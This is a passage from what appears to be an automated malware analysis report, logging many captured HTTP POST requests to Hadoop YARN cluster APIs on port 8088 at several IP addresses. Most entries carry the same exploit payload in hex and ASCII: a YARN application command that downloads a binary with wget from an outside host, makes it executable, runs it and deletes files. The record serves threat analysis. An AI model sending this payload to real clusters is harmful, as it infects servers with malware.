x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 114.142.230.93:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 114.142.230.93:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 114.142.230.93:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 114.142.230.93:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 208.35.19.171:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 208.35.19.171:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 208.35.19.171:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 118.143.223.55:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 118.143.223.55:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 118.143.223.55:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 157.173.158.186:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 157.173.158.186:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 157.173.158.186:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 61.221.100.106:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 61.221.100.106:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 61.221.100.106:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 61.221.100.106:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 184.87.98.222:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 184.87.98.222:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 61.221.100.106:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: 